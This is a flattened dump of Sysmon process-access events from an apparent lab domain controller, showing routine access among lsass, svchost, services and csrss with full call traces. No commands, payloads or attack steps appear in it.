10:39:53.745{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF9-5F80-1500-000000007F01}1356C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000854Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000853Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.745{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000852Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000851Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000850Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000849Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF7-5F80-0A00-000000007F01}852940C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000848Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000847Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF7-5F80-0A00-000000007F01}8521116C:\Windows\system32\services.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000846Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF7-5F80-0A00-000000007F01}8521120C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1600-000000007F01}1572C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.729{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.714{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.714{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.682{733EE690-3DF9-5F80-0C00-000000007F01}588648C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+d69b2|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 